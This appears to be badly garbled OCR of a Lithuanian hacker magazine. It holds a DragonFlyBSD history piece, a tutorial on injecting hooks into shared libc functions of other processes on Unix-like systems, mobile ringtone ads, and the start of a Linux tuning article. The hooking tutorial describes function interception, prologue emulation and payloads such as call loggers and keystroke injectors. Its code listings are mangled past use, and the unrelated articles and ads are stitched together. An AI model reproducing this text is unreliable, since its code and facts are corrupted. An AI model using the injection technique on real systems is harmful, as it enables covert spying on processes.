jo idėjų pagrindu buvo perrašyta atitinkama Linux branduolio 
dalis. Jis taip pat yra AmigaOS (DICE) skirto C kompiliatoriaus 
ir užduočių planuotojo dcron (Dillon's Cron) kūrėjas. 


1024x768 (tokia galimybė pirmą kartą atsirado būtent DragonFly 
sistemoje ir tik po to buvo perkelta į FreeBSD). Toliau kompiliuojam 
ir įdiegiam branduolį bei perkraunam mašiną: 


cd /ust/src 

make buildkernel KERNCONF- MY KERNEL 
make installkeme! KERNCONF- MY KERNEL 
reboot 


3 So T OT 


[Išsamesnių studijų kursai] Nemažą vaidmenį naujosios OS 
populiarinime atlieka jos dokumentavimas. Vis dėlto pritaikę Šį 
teiginį DragonFlyBSD, gauname trečiąją problema. Projekto dalyvių 
skaičius labai ribotas, nerealizuotų idėjų labai daug, todėl tiesiog 
nėra kam užsiimti dokumentacija. Pagrindiniu informacijos šaltiniu 
būtų galima laikyti oficialų handbook (Ieaf.dragonflybsd.org/—justin/ 
handbook/), jeigu tik jis nebūtų greitai padaryta FreeBSD handbook 
variacija, kurioje daug kur galima sutikti tokių įdomių perliukų, kaip 
DragonFly 4.4. Tam tikrų įdomių dalyku (gaila, nedaug) galima rasti 
wiki puslapyje (wiki.dragonflybsd.org). Chronologišką branduolio 
vystymąsi galima rasti čia: wiki.dragonflybsd.org/index.php/User: 
Jgarcia/Status Page Devel. 

Ganėtinai išsamų DragonFly įdiegimo ir naudojimo aprašyma 
rasi Aleksejaus Fedorčuko straipsnių serijoje (unix.ginras.ru/bsd/ 
dfbsd000.html). Kitų informacinių šaltinių man rasti nepavyko, 
todėl galima tvirtinti, kad bendrai paėmus DragonFly skirtos do- 
kumentacijos yra labai mažai. 


[Epilogas] Kartą vienas iš DragonFly diskusijų dalyvių uždavė 
klausimą: „Kodėl jūs naudojate šią 0S?“. Atsakymas buvo: „Mes 
tikime Metu“. Ka gi, ir mes juo patikėsime, o laikas parodys, kas 
gausis iš šio didelio ir įdomaus projekto. 


* ATA a0d ATARI deeicos 
tm 


[Kodėl „FreeBSD- 


at is47 port UŪ UB1 Icų 14 


"i H+ 4*7] odė o meti, 
E HL kai buvo aktyviai 
desi sapien 2 simas „Eini Ti dirbama ir ruošiamasi 
ae Ši "T "1 A "r H 
= FreeBSD-5 išleidimui, 

* i Iphrrala 
I akylai DragonFly komanda 


* 

* i 
tran = RA Tad vietoje naujos OS 
pagrindo pasirenka 


Aa a aa ketvirtosios versijos 
pasas ETO veda Šiais kodą? Iš tiesų vis- 
Aevics atima kas paprasta. Kaip 
Vija ix the delanit Aaa sa esenėlinų 0 XD consule pastebi pats Metas 
iptiom A 1000 eee e“ Dilonas, ketvirtosios 
ona “ + 
Aevico p * support sceera! AGP Chipseta versijos kodas dar nėra 


„sugadintas“ skaitlin- 
gomis FreeBSD-5 


* Viostinų poist support > do mt dinablo 
tevice np st nexus? port 10 NPX irų 13 


jeriai (CM) port ji k i as 
denio m Kisielis naujovėmis, todėl jis 
ara Bie At IT dlmeio Tt om IS 3 ypač gerai tinka kaip 
„kodo bazė“ sumanytų 

ta pati opcija, kuri įjungia grafine konsolę idėjų realizacijai. 


OS išeitiės 
toriumas, 


a 


Pirmoji laida egzistavo 
neilgai: buvo surasta krūva 
klaidų, kurias paskubėta 
ištaisyti išleidžiant naująja 
1.0A laidą. 


gegužės 
2004 


Vienas po kito pradeda 

atsirasti įvairių DragonFly 

beta versijų iso atvaizdų 
kompaktai. 


RC stadija buvo labai trumpa: 


praėjus porai savaičių po 
1.0RC1 išleidimo, pranešta 
apie pilnavertės sistemos 
išleidimą — DragonFlyBSD 
1.0-RELEASE. 


Pasaulis išvydo Naująją sistemos 


laidą — DragonFly-1,2, 0. Tuo 


Pačiu pasikeitė sistemos kūrimo 
P aks, Dabar ji turi Stabilią 

emą (lyginiai skaičiai antroje 
pozicijoje) ir kuriamą šaką sų 

nelygine Numeracija. 
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"apa 2 
004 


Pasirodo DragonFly pre=ras 
Iease, tiksliau DragonFlyBSD 
1.0RC1. Jame jau yra BSD 
Installer įdiegiklis, kuris api- 
formintas kaip universalus bet 
kokios BSD sistemos įdiegiklis. 


SOFTWARE 


IMPLANT 


a 
= 
Z 
5 


Sisteminis špionažas „*nix“ sistemoje 
Antroji dalis 
„*nix“ skirtas švirkštas arba funkcijos ant adatos 


ĮSISKVERBTI | SVETIMO PROCESO 
ADRESŲ ERDVĘ — PAPRASČIAU 
NEI PAPRASTA! PIRMOJOJE STRAIP- 
SNIO DALYJE MES PAMATĖME, 
KAIP SUKONSTRUOTI UNIVERSALŲ 
ŠVIRKŠTĄ. DABAR TELIEKA 
SUMAIŠYTI TĄ MAGIŠKĄ TIRPALĄ, 
KURIS BUS SULEISTAS Į MAŠININIO 
KODO LĄSTELIŲ VIDŲ. PRIEŠ MŪSŲ 
VAKCINĄ TUOJAU PAT STOS BA- 
TALIONAS IMUNINIŲ KŪNELIŲ, 
PASIRUOŠUSIŲ AKIMIRKSNIU JĄ 
SUNAIKINTI (IR SUNAIKINTŲ!), 
TAČIAU AŠ ŽINAU VIENĄ GUDRŲ 
RECEPTĄ.... 
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[Įvadas] 
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Klasikinis she// kodo įdiegimo algoritmas atrodo taip: išsaugojame keletą perimamos funkcijos baitų ir įterpiame jump | savo 
thunk, kuris padaro tai, ko mums reikia, įvykdo išsaugotus baitus ir perduoda valdymą originaliai funkcijai, kuri gali būti iškviesta 
tiek su jump, tiek ir su call (išsamiau šis klausimas buvo aptartas „Hakeryje“ spausdintame straipsnyje „Apsauginių mechanizmų 


kapituliacija“). 
Sudėtingiausia 


išsirinkti thunk'o įkurdinimo vietą. Tai turi būti visiems procesams prieinama atmintis, o tokios atminties savo 


žinioje Mes neturime! Mes žinome, kad „bandomoji“ biblioteka pretenduoja į kiekvieno proceso adresų erdvę, tačiau ši erdvė 
jau užimta! Sukrapštyti porą dešimčių išlyginimui skirtų baitų visai realu, tačiau mums to ir trūksta! Tenka gudrauti. 

Visų pirma, perėmėjo kodą mes galime išsaugoti kokioje nors „nereikalingoje“ funkcijoje, pavyzdžiui, gets, 0 į visų perimamų 
funkcijų pradžią įterpti... ne, ne jump (šiuo atveju perėmėjas nesugebės nustatyti, iš kur gautas iškvietimas), o call gets! Gets 
viduje perėmėjas iš steko išgauna grįžimo adresą, sumažina jo ilgį komandos call ilgiu (32 bitų režime tai yra 5 baitai) Ir gauna 


ieškomą rodyklę į funkciją. 


T MEMPS I in 


Žinant rodyklę, galima nustatyti funkcijos pavadinimą čia 
mums padės funkcija dladdr (iš GNU Extensions). Ji neįeina į 
POSIX, tačiau ją supranta praktiškai visos *nix sistemos, taigi, 
dėl šito galima nesijaudinti. Pastaba: primenu, jog įsiterpdami 
į gets, lygiai kaip ir į bet kurią kitą funkciją, mes negalime kirsti 
puslapių ribų, kadangi už einamo puslapio ribos veikiausiai yra 
visiškai pašalinė atminties sritis! Jeigu būtina modifikuoti visą 
gets funkciją, tai reikia surasti visus jai priklausančius pusla- 
pius, O čia mums padės tas pats metodas, kurį naudodami 
mes suradome pirmąjį atminties puslapį. 

Kebliausia, kad dladdr yra libdl.x.so bibliotekoje, kurios 
konkretaus proceso atmintyje gali ir nebūti, o jeigu ji ten 
yra, tai nežinoma, kokiu adresu ji užkrauta. Kai kurie hak- 
eriai tvirtina, kad thunk kode galima naudoti tik tiesioginius 
branduolio iškvietimus per INT 80h sąsają, o visos likusios 
funkcijos nėra prieinamos. Iš tiesų taip nėra! Kaip rodo 
disasembleris, dladdr — tai viso labo dl addr supantis „apv- 
alkalas“, įgyvendintas /ibc.so.x bibliotekoje, o ji tai jau tikrai 
prieinama! Tiesa, čia jokiu būdu negalima pasikliauti pagrind- 
inio užkrovimo adresu, o iškvietimas turi būti santykinis. 
Paprasčiausia santykinio iškvietimo generavimo paprogramė 
atrodo taip: 

Paprogramė generuoja santykinį iškvietimą ir įkelia jį į globalųjį 
buferį buf code, lib name — laužiamos bibliotekos pavadini- 
mas, from — funkcijos, iš kurios bus atliekamas iškvietimas, 


iškviečiamos funkcijos 
call instrukcijos poslinkis 


pavadinimas, pavyzdžiui, gets, to 
pavadinimas, pavyzdžiui, write, delta 
nuo thunk kodo pradžios: 


/ call 00000h 
unsigned char buf code[| 


unsigned chat 
base = dlopen(lib nome 
from dlsym(base, from); II 


| 


2 Aleumthnca 
ft = OisymDase 


"((unsigned int“) šbul 


from — sizeof(buf code) — delto 


!0 


return 666; 


Funkcija call r iškviečiama Iš Įdiegiančiosios programos, 
pavyzdžiui, mūsų mem.c, ir generuoja santykinį call iškvietimą 
iš adreso from į adresą to. Ji gali būti panaudota bet kokių 
funkcijų iškvietimui, bet tiktai ne d! addr. 

Modernizuosime programą mem.c ir pataisysime funkciją gets 
taip, kad ji į ekraną išvestų simbolį „*“. Mes iš bibliotekos 
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libc iškviesime funkciją write su tokiais parametrais: write 

(L;65*1) atkreipk dėmesį į konstrukcija £.*“. Mes į EG I r — i — 
steką įkeliame simbolį „*“ ir perduodame funkcijai jo rodyklę. Iš2t 0BiočėlO . Attributes: bo-based frane 

O kas gi mums lieka? Juk duomenų segmentas mums nėra 

prieinamas! Tenka naudoti steką! Prireikus ten galima įkelti 

ne vieną simbolį, bet ir ASCIIZ eilutę (tik nepamiršk po to 

jos iš ten ištraukti kai kurie tai pamiršta, dėl ko gauna 

nesubalansuotą steką ir segmentation fault). 


Modernizuotas mem.c variantas, | gets pradžią įdiegiantis 
write(1,4“*",1) iškvietimą 


1 I 
keliame tunkcijos Wrilc 
mes nežinome 

(hūt OUI 
0x88.0x0( * mov ebxesp | x1 bal BBiLA 
r ) a , bal 08458 
0x33 0x(0 XOF 60 t 60105450 
, A, «1 BABA 
“ . z . 60108453 
0x40 f bėlėdi 55 
60188458 
(50 š | Ta AUTGI 
č 80188463 

1 


Ux5: 


Ux5U 


sota bibliotekoje |ibe.s0, adinasi 


rašomas sugėneruo! santykinis IUNKCj 


nsigned char but code||- į OxE8,0x0,0x0,0x0,0x0 |: 
simboliu iš steko išgauname argumentus 
unsigned char buf posi[| 


0x83,0xC4,0x10 * add esp,10 
0xC3 


įrašytas surinktas !hunk 
buf pos! 
buf dst[sizeof(buf pre) 


jeneruojame santykinį write iškvietimą 


r(„libc.s0.6“, „gets“, „write“, sizeol(hul pre)) 


surenkame thunk koda 
reot(hul pre)) Sukompiliuojame programą ir įsitikiname, kad ji veikia, taip 
sizeof(buf pre), buf code, sizeof(buf code)) priartindama mus prie pilnavertiško perėmėjo sukūrimo. 
sizeof(buf pre) 200 code), bul Thunk kodą padarę šiek tiek sudėtingesniu, mes galėsime 
ne tik į ekraną išvesti savo duomenis, bet ir išsaugoti juos | 

bylą (loginti)! 
distatome standartinį prologą arba įterpiame C3h (ret) Programuoti mašininius kodus labai nepatogu, todėl atsiranda 
| PAGE SIZEĮ 0xC3) natūralus noras įdarbinti C ir kitas aukšto lygio kalbas. Tai visa 
Yo PAGE SIZE) = 0455 įmanoma! Kadangi thunk kodas iškviečiamas jį iškvietusio 
proceso kontekste, iškviesdamas dlopen/dlsym jis gali užkraut 
0xC3 savo dinamines bibliotekas. Su mašininiu kodu rašomas tik 
mažytis užkroviklis, o pagrindinis perėmėjo kodas sukoncen 
s kopijuojame thunk kodą truojamas dinaminėje bibliotekoje, kurią galima parašyti ir su 
y tunsigned int)p) Vo PAGE SIZEĮ, but dst, sizeol(bul C. Beje, atsisakyti funkcijos gets visiškai nėra būtina, juk mes 
IST) jos funkcionalumą galime perkelti į mūsų dinaminę biblioteką! 
Tiesa, perkelti reikia būtent funkcionalumą (t.y. perrašyt 


funkciją iš naujo), o ne bandyti kopijuoti kodą, kadangi gets su 
santykiniais adresais iškviečia „savo“ subfunkcijas. Jos kūnui 
pajudėjus į kitą vietą šie adresai pasikeis ir... laba diena, štai 


jums segmentation fault! 


Funkcijų perėmimas ne sapne, o tikrovėje 
Perėmime sudėtingiausia — nustatyti mašininių instrukcijų 
ribas, virš Kurių irašoma perėjimo komanda į perėmėja (tas 


pats thunk, mūsų atveju „gyvenantis“ funkcijos gets kūne). 


Siaip jau norint išspręsti šią problemą reiktų parašyti mini 
disasemblerį, bet... kiek teks visko rašyti! O galima be viso šito 
apseiti? Galima! 

Daugelio bibliotekinių funkcijų pradžioje yra standartinis 
prologas, kuris gali atrodyti, tarkim, taip: PUSH EBP/MOV 
EBPESP/SUB ESPXXXh (55h/89h E5h/ 83h ECh XXh). Jis 
mums duoda 5 baitus norint igyvendinti įsiskverbimą 
tai yra būtinas minimumas! Sutinkami ir kitokie, kiek 
kitaip atrodantys prologai, pavyzdžiui: PUSH EBP/MOV 
EBPESP/PUSH EDI/PUSH ESI (55h/89h E5h/ 57h/ 56h); 
PUSH EBP/MOV EAX, OFFFFFFFFh/MOV EBP ESP (55h/B8h 
FFh FFh FFh FFh/89h E5h); PUSH EBP/XOR EAX, EAX/MOV 
EBPESP (55h/31h Oh/89h E5h). Geras perėmėjas turi 
ivertinti Ir JUOS. 

Taip mūsų perėmėjas turi patikrinti pirmuosius 5 perimamos 
funkcijos baitus ir, jeigu jie sutampa su standartiniu arba šiek 
tiek optimizuotu prologu, nukopijuoti šį prologą | savo kūną ir 
vykdyti jį prieš valdymo perdavimą originaliai funkcijai. O kur jį 
galima nukopijuoti? Kaip jau kalbėjome, duomenų segmentas 
mums nėra prieinamas, steko liesti negalima (prieš valdymo 
perdavimą funkcijai jis turi būti atstatytas), o Kodo segmentą 
apskritai uždrausta modifikuoti. 

Egzistuoja mažiausiai trys sprendimai: 

visų pirma mes galime iškviesti funkciją mprotect, kodo pusla- 
piui priskirdami atributą writable (tačiau tai negražu); 


:00893FC0 
:060093FC0 

0893FC0 
:00093FC0 
:00093/C0 


:00093+:C2 
:80093FC6 
:800931 CA 
:80093i CF 
:00093f01 
:08093F03 
:00093/08 
:00693F0A 
:00093/0A 
:00893F04 
:00893F08 
:00093fF08 
:90093F08 
:00093F08 
100093F0C 
:608093FE1 
:00093FE7 
:08093FE9 
:080893F£8 
:80693FEC 
:00093FF1 
:08093FF2 
:00093:53 
:00693£F5 
:00093FF8 
:00093:F8 
:08093FF8 
:00693F:8 


:00094000 
:00894000 


L r 
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antra, naudoti steką vis dėlto galima: į viršūnę įmetame prologą, 
ten pat ikeliame ir visų argumentų kopiją bei perduodame ja 


valdyma lyg nieko ir nebūtų nutikę; 
trečia, mes galime pasielgti taip: 


Įdiegiančiosios programos fragmentas, a 
mos funkcijos prologą ir įdiegiantis apdorotoja 


prologu 


Dabar „mūsų“ prologo numeri perkeliame į EAX 

perėmėjas žinotų, Kokį prologą jam emuliuoti 

Keletą skirtingų prologų pripažįstantis bazinis perėmėjo kode 
(yra funkcijoje gets): 


prepare prolog 
M 


JV EAX 
"Uu 


JMP shoi 


short do begin 


al 
MOV EAX, 0x2 


MP do begi 


lo begin 
pagrindinis pėrė škvieslos Iunkcijos adrėsa 
ta dės viena kitos atskirti perimamas funkcijas; valdymo per 


nas funkcijai su jos rologo emuliavimu 


emuliuojame PUSH EBP/MOV EBPESP/SUB ESP tipo prologo 


PUSH EBP 
MOV EBP 


iš olmintios imamę XXI 
s mašininę komanda 


emuliuojame PUSB EBP/MOV EBP.ESP/PUSH EDI/PUSH ESI tipo 
yma 
PUSH EBP 
MOV EBP ESP 
PUSH ED 
PUSH 


Idiegiančioji programa analizuoja perimamos funkcijos prologą 
r, priklausomai nuo rezultato, į jos pradžią įdiegia arba call 
prepare prolog 1, arba call prepare prolog 2, kur prepare pro- 
log X žymė thunk kodo viduje, kurį mes įkėlėme į funkciją 
gets. Komanda cal/ užima 5 baitus, todėl komanda SUB ESPXXh 
ją tiksliai perdengia taip, kad XXh atsiduria tiesiog už jos pabai- 
gos. Taigi mums nereikia paties perėmėjo kūne išsaugoti XXh! 
š thunk kodo iškviečiama komanda SUB ESP byte ptr [EAX] 
puikiai emuliuoja SUB ESPXXh vykdymą! 

Pateiktas pavyzdys gadina EAX registro turinį, todėl jis veikia tik 
su cdecl ir stdcall funkcijomis. Taip neįmanoma perimti fastcall 
unkcijų, kurios argumentus perduoda per EAX. Tačiau originalųjį 
EAX galima išsaugoti steke ir atstatyti prieš pat valdymo perdavimą 
perimtai funkcijai, tačiau šiuo atveju JMP EAX teks pakeisti į RETN, 
0 į steko viršūnę iš anksto įkelti perėjimui skirtą adresą. 

Stai ir viskas. Perėmėjo skeletas sėkmingai surinktas ir 
paruoštas darbui. Telieka pabaigti „kovinį įdarą“. Tai gali būti 
tiek iškvietimus protokoluojantis logeris, tiek tam tikru funkcijų 
škvietimą (pavyzdžiui, bylos pašalinimą) blokuojantis antiprotek 
torius, tiek klaviatūrinio įvedimo funkcijoms paruoštus duomenis 
„Dakišanti“ makromašina, tiek... kas tik nori! 
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standartinis funkcijos getaddrinfo prologas, kuri sugadino tiesioginis 


persijungimas 


[Stabilumo problemos| 

Mūsų sukonstruotas perėmėjas dėl savo 
prigimties ganėtinai kaprizingas ir periodiškai 
nulūžta be jokių akivaizdžių priežasčių. Kodėl 
taip vyksta? Peržiūrėkime funkciją func su 
standartiniu PUSH EBP/MOV EBPESP pavidalo 
prologu. Tarkim, procesas A įvykdė komandą 
PUSH EBP ir dar tik ruošėsi pradėti vykdyt 
MOV EBPESP kaip jį nutraukė sisteminis 
planuotojas, ir valdymą gavo mūsų procesas 
B, kuris atlieka funkcijos func perėmimą, į jos 
pradžią įterpiant instrukciją call. Kai procesas 
A atnaujins savo vykdymą, komandos MOV 
EBPESP steke jau nebebus, nes ten bus nuo 
call likusi galutinė dalis, kurią įvykdžius viskas 
bus sudraskyta į gabalus. Be abejo, tokio įvykio 
tikimybė labai maža, tačiau ypatingai atsakin 
gose situacijose su ja vis tik reikėtų skaitytis. 
Norint perėmimą padaryti saugų, įterpiamos 
instrukcijos ilgi būtina sutrumpinti iki vieno 
baito, tačiau tokių instrukcijų tiesiog nėra! 
Palauk, kaip tai nėra? O kaip dėl INT 03h 
(CCh)? Tradiciškai ji naudojama sustojimo 
taškams ir taikomajame apsaugoto lygio suke- 
lia išimtį, kurią iš branduolio (tiksliau sakant, iš 
užkraunamo modulio) lengva perimti. Apie tai 
jau buvo rašyta straipsnyje „Handling Interrupt 
Descriptor Table for fun and profit“, kuris buvo 
publikuotas 59-ame žurnalo phrack numeryje, 
todėl mes čia nesikartosim. 

Atkreipiu dėmesį, kad CCh konfliktuoja su kai 
kuriais apsauginiais mechanizmais ir, atitinka 
mai, su derintuvais, todėl geriau įterpti ne INT 
03h, o kokią nors „uždraustą“ vieno baito 
komandą, tokią, kaip CLI (FAh), sukeliančią 
išimtį, kurią mes periminėsim. 


nan! 


[ĮSustojimo taškai] 
Derintuvai bibliotekinėse 
funkcijose gali kurti programi- 
nius sustojimo taškus, į Kurių 
pradžią įterpiama komanda INT 
03h (CCh). Tokiu atveju mūsų 
perėmėjas negalės atpažinti 
prologo, kas nėra gerai. Išeitis 
akivaizdi: sulyginti tiktai 2- 
ą, 3-red 2006- 
Shlashdotią, 4-tą ir 5-tą pro- 
logo baitus, o pirmąjį ignoruoti. 
O ką daryti su sustojimo tašku? 
Jeigu virš jo įrašysime call, tai 
jis bus ištrintas, o derintuvas 
praras funkcijos kontrolę, kas 
kai kuriais atvejais nėra priim 
tina. Tuomet reikia įsiterpti nuo 
2-ojo baito, tačiau šiuo atveju 
komanda call visiškai ištrins 
SUB ESPXXh, todėl XXh teks 
išsaugoti kokioje nors kitoje 
vietoje. 


c98 Nn 
c9873 
c9878 
c987e 
c9883 
c9884 
c9885 
c9886 
c9887 
c9888 
c9889 
c988a 
c988b 
c988c 
c988d 
c988e 
c988f 
c9890 


9892 
9896 
9894 
9891 


98a1 


cc 


mkdir 


lchmod 


C:MEMPM ibc-2.3.2.so0 


errno 


location 
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[Pabaiga| 
API funkciju perėmimo Mecha 


nizmai Windows sistemoje 


inėti, todėl Ilyti radika 
na sunku. 

UNIX sistemos 
prasčiau, todėl jos 
neatskleistu g; 
traukia hakerius ir kitus kūryb 
žmones. Mano Č 
ne vienintelis ir v 


ar augti ir augti. 

Nepaisant to, mano greita ranka 
ašytuose įrankiuose šis bū 
veikia pakankamai normaliai 
Linux, tiek ir BSD sistemose 


UEK 


VEIKSMO piaman 


Kodas: 204339660 


Kodas: 186849660 


"Iksmenai 2" - žakdimas, apjungęs 
žymius komiksus 1 kvapą 
graužiant Ilma. Surnk komandą 


Tokiais automobidtais gali 
pasiekti tesiog neitikėtinė 
Gražuolės prie finišo Ilnijė 
laukia tavo pergalės! 


5 5. Princas sugi 
Babiloną, kur turi išgolbėti m 
Gyvent cis r perimti sostą 


avo pulko 
Ss telefone tu 


Kodas: 


T. 


Žaidimo tikslas - užpėdyti 9 
kad kia 
albiojė Ir vorti 
ų tik vieną kata, 
A 361 
a 6100. 0 


Mažioms kirmėliukams, 
sitvirtinusiems pilyje, reikia karo 


Žaidim no kurėja Ska 6 da 
dainas akdimo grafikai w sukūrė 
topai rel alybės pojūli 


A r užaugink |į 


TELI 


J 207639660 "147208660 106129660 167420060 
""227039660 228289680  228049660 207649660 207569660  225629660 
225819680  222159660 222160660 208889660 225169660 167816660 168139660 168069660 


| 
! Įsitikinkite, kad įjungta Ir veikia telefono GPRS paslauga. Žinutę su spalvoto atviruko kodu nusiųskite į numerį 
KT Gaukite žinutę su nuoroda, iš kurios pie lnyg spalvotą Styinuką, 


NOKIA 2450 4100 420 3 
7440 SIEMENS A40 A45 A75 AX 


X420. XB40. XBGO 


6260, 6600, 6610. 6800, 7210, 7250 
10, C230, X120, X140, X200, XI 
30, K3004, K700i, JA00i, WA00 


SU 58, SL65 SAMSUNG 


E300, E530, E630, E7( 


|| 
| ATVIRUKAI LOGOTIPAI 
H 11659 Gimus: SNS. GE 2 
„3 "a 231608680 231449660 228869660 228388660 
367196606 35619660 33839660 HACKER NDX kais “5 
> k 
| or a Ko R aš NG: 228339660 224589660 224559660 188169660 
E Crvani t "A G “Mi 4 — a 
4 * | IMiKdalius i £2-0=£2 PSIGNINY 
| 33149660 23859660 23189660 185845660 175809660 186289660 163809660 
Ge MES E POUEFINCA SPL. RS 
P UD ės in 163779660 160328660 153769660 122769660 
23178660 22788660 22778660 CISLAKs 
2  C0BL LrūrŠe MAMA ) 
Ž Žagsiu BN 118278660 108248660 105509660  '105429660 
| E ALUK! Lada A i 
218149660 217549660 217528660 s 
| ai Be ; VALYMO PRIEMONE 
| UA, S TELEFONO EKRANUI! 
217438660 107228660 107179660 Nusiųsk kodą 63009660 į numerį 
18. sa 3 EI KUaČIU Tu gausi TUŠČIĄ LOGOTIPĄ 
“2 | [ 
(A 2 "> ša Dėmesio! Tik NOKIA leke 
107168660 103559660 103479660 Kaina 1951 
Žinutę su kodu nusiųsklte į mūsų numerį „SIEMENS telefonams prie kodo pridėkite raidę S (pvz., 3689660s) 


3310. 3410, 3330, 3510, 5210. 5110 (tik logotip: 


0, BA5O, 8A00 SIEMENS A55, A65, 


071, 6030, 6060, 6210, 6: 
0, C85, CXTS, CXV 70 


i, 6510, 7110 (tik logotipai), 7270 
5, 555. SAMSUNG C100, C200 


SUKURK Ave yo TAMĄ, 


on 


415 biuc | vs ma kiliė 


VOKALINĖS MELODIJOS 


James Brown: I Feel Good 120239660 
Vampyro balsas: Aš tave matau! 206619660 
Dolce 8 Gabbana 230848660 
Arash: Tike tike kardi 188708680 
Jurga: Nebijok 184559660 
A. Mamontovas: O, meilė! 178679660 
Teie2: Paplepėkim 167438660 
Skambutis Iš morgo 206609660 
Crazy Frog: Axel F 165228660 
Piktos katės klyksmas 153149660 
Zvonok bratanu: Koroche, tema takaya 153119660 


Įsitikinkite, kad telefone Įjungta Ir veikia GPRS paslauga 
Nusiųskite žinutę su vokalinės melodijos kodu į numerį 


Andrius: Mės vyrai 176278660 176278660p 
Yva: Pabučiuok 223069660 223058660p 
Madonna: Sorry 205118660 205118660p 
Daz Sampson: Teenage Life 225889660.225889660p 
Aventura: Cuando Volveras 111359650 111359660p 
Shakira: La Tortura 165108660 165109680p 
Skamp: L'attente 230728660 230729660p 
Tokio Hotel: Durch Den Monsun 184069660 184069660p 
69 Danguje: $ Dangui 210629660 210629660p 
US5: Come Back To Me Baby 215719660 215718660p 
Iš k. f. Bumeris 2 216149660 216149660p 
Lordi: Hard Rock Hallelujah 225829660 225829660p 
Angelina: Negalvok 223148660 223148860p 
Adamsų šeimynėlė 7019660 7019660p 
Žilvinas Žvagulis: Faina 151279660 151279660p 
Iš serialo "Brigada" 34148660  34149660p 
Rasa Ir Jonas: Teka saulė 2306869660 230669660p 
Iš K.f. „Harlis Poteris" 146719660 146719660p 
Andrius: O kam sava 205079660 205079660p 
Sel feat. Mia Muzika 223079660 223079660p 
Sean Paul: Temperature 221608660 221509660p 
LT United: We Are The Winners 2130088660 213009660p 
The Rasmus: Sail Away 2257089660 225709860p 
Tokio Hotel: Rettė Mich 217359660 217359660p 
Vilija: Man sakei 218628660 218629660p 
Vudis: Kaip du kart du 176658660 176659660p 
Biack Eyed Peas: Gone Going 227479660 227479660p 
Iš k.f. „Krikštatėvis“ 121738660 121739660p 
Antanas: Sudeginti tiltai 205179660 205179660p 
Žilvinas Žvagulis: Itališka dainelė 145008660 į 145009860p 
Raketa: Padarys manė 210659660 210659660p 
Starlight: I Don't Know 227519660' 227519660p 
Mokinukės: Bye Bye 1221096601 122109680p 
Vilija: Spjaudau Ir gaudau 176649660! 176649660p 
Mattafix: Big City Life 186548660 Į 


įrašyk draugo telefono numerį Įsštikink, ar || tinka draugo 
(pvz, 1709660 XOXXXXX) telefonui 


SIUNTINUKAS DRAUGUI: 2 
Išsirink paslaugą (išskyrus logotipus Parskaityk pasirinktos 
r žardimus). Pa kodo palik tamą ir paslaugos instrukciją 


Įsitikinkite, kad telefone įjungta Ir veikia GPRS paslauga 


Žinutę su kodu (pvz., 3689660p) siųskite į mūsų numerį 
NOKIA 2650. 3400, 3200, 3220, 3300, 35 1 6021, 6030, 6060. 61 
6600, 6610. 6800. 7210. 7250, 72504, 7260. 72 0 A800 SAMSUI 

C210, C110, CZ 0. D800, X100, X120, X140 X200, X J 
300. E530, E600, E630, E700. E710, E720 
5 AX74. C55, CBO, C65, C75, CXB6 CFA 78, CXTS, 
55, SL6S SONY ERICSSON 1610, TA), 406, 700 1300) WBOC 


SIEMENS 14 
M75, MC60, S55 


Žana kodu siųskite | numerį 
SIEMENS telefonams prie kodo pridėkite raidę S (pvz., 3689660s) 


NOKIA 1100. 2100. 2210, 3310, 3410, 3330, 5210, 5: 2 63101, 8510, 7110, 8210 
8510, KA50, 8800. katos. R210s SIEMENS AS), A52 CAB, 545, ME45 M 


CJ 
Norėdami užsisakyti GPRS paskambinkite savo operatoriui. 1566 - Omnitel. 1501 - 
Bitė GSM, 117 - Tele2. Kad gautumėte NOKIA (išskyrus 3220, 5140, 6020, 6021. 6030, 6060, 
6230, 7260, 7270, 7280, 7370. 8800) arba SAMSUNG (išskyrus C100, C110, E360, £530, 
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Naminio tukso tiuningas 
Kaip paspartinti savo „Linux“ 


Tiuningas — tai nuodugnus kokio nors operacinės sistemos komponento 
sukonfigūravimas, padidinantis jo našumą. Tiuninti galima ką tik non: nuo tinklo 
posistemės iki virtualios atminties parametrų. Skirtingai nei atnaujinimas, tiuningas 
turi vieną neginčijamą privalumą: nereikia pirkti papildomos aparatūros, todėl tiunin- 
gas be viso kito taip pat taupo pinigus. Tiesa, atsinaujinant taip pat galima sutaupyti, 
jeigu tai daroma išmintingai. Pavyzdžiui, jeigu pas mane būtų kompiuteris su Duron 
1,2 GHz procesoriumi ir 128 Mb atminties, aš geriau nusipirkčiau papildomus 256 
Mb atminties, nei galingesnį procesorių, kadangi Linux jautresnis atminties kiekiui, 
o ne procesoriaus dažniui. Vis dėlto šiandien atidėkime atnaujinimo klausimus ir 


visą savo dėmesį sutelkime į naminio tukso tiuningą. 


[Tavo nuosava tiuningo ateljė] Iš pradžių apsispręskime, 
kaip mes konfigūruosime mūsų sistemą. Siūlau eiti 
mažiausio pasipriešinimo keliu — o ką, jeigu po paties 
paprasčiausio pakeitimo rezultatai tave visiškai tenkins 
ir visą likusį laiką tu galėtum praleisti prasmingiau? Pa- 
daryti sistemą neveikiančią mes taip pat neplanuojame, 
kadangi po visų patobulinimų mes neturime prarasti nei 
stabilumo, nei patikimumo, nei komforto. Sudarykime 
veiksmų planą: 

/ Atjungti nereikalingus servisus. 

/ Padidinti virtualios atminties apimtį. 

/ Patiuninti swap'ą. 

/ Pakeisti procesų planuotojo darbą. 

/ Sukonfigūruoti branduolį. 

/ Įdiegti naują inicializavimo sistemą. 

/ Pasirinkti kitą failų sistemą ir ją patiuninti. 

Derėtų pastebėti, kad visa konfigūracija vyks remiantis 
Fedora Core 4 distributyvo pavyzdžiu. Be to, kai kurie 
straipsnyje aprašyti dalykai neveiks senose branduolio 
versijose (žemiau 2.6). 


[Nereikalingų servisų atjungimas] Kiekvienas paleistas 
procesas „suėda“ ne tik brangų procesoriaus laiką, bet ir 
atmintį, kurios nuolat trūksta. Kad ir ką sakytum, atminties 
per daug nebūna. Būtų visai kas kita, jeigu tau reikėtų 
visų šių servisų. Tačiau praktiškai gaunasi taip, kad mes 
neturime nė žalio supratimo apie kai kurių servisų paskirtį, 
o dalis paleistų servisų bando stebėti mūsų kompiuteryje 
iš viso neprijungtų įrenginių darbą. Kadangi Linux tiuningą 
aptarsime remdamiesi FC4 pavyzdžiu, tai reiškia, kad mes 
peržvelgsim Fedoros servisus. Straipsnio eigoje atkreipsiu 
dėmes ir į Mandrake/Mandriva servisus. Galbūt tavo dis- 
tributyve bus kitų servisų, kurie čia neaptarti, tačiau per 
daug nenusimink: kad ir koks būtų distributyvas, speciali 
konfigūravimo programa padės apsispręsti, ar tau reikia 
